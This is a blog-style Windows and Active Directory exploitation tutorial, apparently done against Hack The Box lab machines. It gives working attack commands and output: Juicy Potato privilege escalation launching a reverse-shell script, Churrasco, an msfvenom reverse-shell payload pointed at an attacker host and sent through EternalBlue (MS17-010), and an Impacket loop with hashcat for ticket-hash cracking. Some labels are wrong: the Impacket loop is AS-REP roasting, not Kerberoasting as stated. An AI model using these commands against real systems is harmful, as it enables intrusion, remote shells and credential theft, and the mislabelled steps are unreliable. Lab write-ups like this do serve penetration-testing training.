on
Windows Exploitation
Disclaimer: All exploits stated in this article are only for educational purposes and all the views expressed in this article are my own personal views and should not be associated with any other organizations/parties that I currently/used to represent.
Introduction to Active Directory
To start off, let me introduction all of you to a new term Active Directory. Active directory is the directory service that was developed by Microsoft for a huge range of directory-based identity-related services, and is included in most of Windows Server operating systems.
A server that is running the Active Directory Domain Service is called the domain controller and its main role is to authenticate and authorize users who are accessing any service. It is also responsible for enforcing and assigning security policies for all the computers in the network.
Lightweight Directory Access Protocol (LDAP) is an internet protocol that is used to access and maintain distributed directory information services over an Internat Protocol network.
Kerberos is a computer-network authentication protocol that uses tickets to allow nodes to communicate over an insecure network to prove their identity to one another in a secure manner.
Currently, Microsoft’s Active Directory uses LDAP, Kerberos and DNS.
Kernel exploits
Let us now move into the more common kernel exploits that can be exploited on the Active Directory.
Juicy Potato Exploit
This exploit leverages on the SeImpersonatePrivilege or SeAssignPrimaryToken that is enabled on the machine to elevate the local privileges to system privileges. Typically, such privileges would be enabled by default if the machine is running IIS or SQL services.
PS C:\> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
However, one thing to note is that the Juicy Potato exploit does not work for all Windows version. It only works for specified Windows version:
- Windows Server 2008 R2
- Windows Server 2012
- Windows Server 2012 R2
- Windows Server 2016
Apart from that, we also require that the COM server has a unique CLSID for the exploit to work. Note: COM server is an executable that implements a set of COM objects and CLSID is the globally unique identifier that identifies a COM object
In such a case, we can use Juicy Potato exploit with the following command.
- p parameter : Program to launch. In this case, we have a shell.bat that will create a reverse shell payload
- l parameter : Port where the COM server is listening to. In this case, the port will be the port of the listener of our reverse shell.
.\JuicyPotato.exe -t * -p shell.bat -l <port>
Churrasco exploit (MS09-012)
This exploit is similiar to that of the Juciy Potato exploit as explained earlier which leverages on token kidnapping, wherein the SeImpersonatePrivilege would have to be enabled for this exploit to work.
However, the difference between the Churrasco exploit and that of the Juicy Potato exploit is that the Churrasco exploit generally works for older Windows versions, while the Juicy Potato exploit works for newer versions of Windows.
Apart from that, we would also require access to the target server as nt authority\network service user.
c:\windows\system32\inetsrc>whoami
whoami
nt authority\network service
Finally, using the churrasco exploit would grant us privilege to execute any commands as the nt authority\system user.
C:\wmpub>.\churrasco.exe "whoami"
.\churrasco.exe "whoami"
nt authority\system
Eternal Blue Exploit (MS17-010)
If you have been following world news closely, this Eternal Blue exploit would not be foreign to you. Yes, this is the very exploit that was used in the Wannacry attack in 2017, which was one of the largest ransomware attack thusfar.
The Eternal Blue exploit affects any software that uses Microsoft’s SMBv1 server protocol and it works by exploiting CVE-2017-0144, which then allows remote attackers to execute arbitary code by sending specially crafted messages via the SMBv1 server.
For this exploit to be carried out successfully, we would need access to the accessible named pipes. To check for this pre-requisite, we could use the checker.py script from this repo
┌──(HTB2)─(kali㉿kali)-[~/Desktop/MS17-010]
└─$ python checker.py 10.10.10.40
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (64 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (64 bit)
browser: Ok (64 bit)
To create a reverse shell using this Eternal Blue exploit, we would need to first create a reverse shell payload using msfvenom
┌──(kali㉿kali)-[~/Desktop]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.8 LPORT=4000 -f exe > rev_shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Finally, we will execute the Eternal Blue exploit to send the reverse shell payload to our target machine.
┌──(HTB2)─(kali㉿kali)-[~/Desktop/MS17-010]
└─$ python send_and_execute.py 10.10.10.40 rev_shell.exe
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: browser
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa8003f21ba0
SESSION: 0xfffff8a00a9c2760
FLINK: 0xfffff8a008a22088
InParam: 0xfffff8a008a1515c
MID: 0x703
unexpected alignment, diff: 0xc088
leak failed... try again
CONNECTION: 0xfffffa8003f21ba0
SESSION: 0xfffff8a00a9c2760
FLINK: 0xfffff8a008a35088
InParam: 0xfffff8a008a2815c
MID: 0x703
unexpected alignment, diff: 0xc088
leak failed... try again
CONNECTION: 0xfffffa8003f21ba0
SESSION: 0xfffff8a00a9c2760
FLINK: 0xfffff8a008a42088
InParam: 0xfffff8a008a3c15c
MID: 0x703
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Sending file 6B2H4M.exe...
Opening SVCManager on 10.10.10.40.....
Creating service QwKt.....
Starting service QwKt.....
The NETBIOS connection with the remote host timed out.
Removing service QwKt.....
ServiceExec Error on: 10.10.10.40
nca_s_proto_error
Done
Kerberoasting
Enough of kernel exploits, let us now move on to kerberoasting.
Kerberoasting is a post exploitation attack which extracts the service account credentials from the Active Directory for offline cracking of the credentials.
This attack is effective because the attacker can easily pull this off without requiring domain administrator credential and the service account credentials can be easily extracted without sending packets to the target.
So, how does Kerberoasting work?
- To start the attack, the attacker must have access to the account of a domain user. Keep in mind that this user does not require any adminstrator privileges. He/she just needs to be able to authenticate to the domian
- After the malicious user has been successfully authenticated by the domain, they will then receive a ticket granting ticket (TGT) from the Kerberos key distribution center(KDC) which is signed by the KRBTGT service account in the Active Directory
- The attacker will then request a service ticket for the service that they want to compromise. The domain controller will then retrieve the permissions from the Active Directory database and create a TGS ticket. Because of that, only the service and the domain controller can decrypt the ticket since only both of them share the same secret.
- The domain controller will then give the attacker the service ticket which was presented to the service, which will decrypt the ticket to determine if the attacker has the permission to access a service. At theis point, the attacker may then extract the ticket from the system memory and crack the hashes offline.
This entire process can be automated firstly by the use of Impacket to request the service tickets and returning them in the form of crackable ticket hash formats.
for user in $(cat users.txt);
do
impacket-GetNPUsers -no-pass -dc-ip 10.10.10.161 htb.local/${user}
done
Afterwards, we can then easily crack these hashes using hashcat
┌──(kali㉿kali)-[~/Desktop]
└─$ hashcat -m 18200 hash.txt /home/kali/Desktop/pentest/wordlist/rockyou.txt --force
TO BE CONTINUED…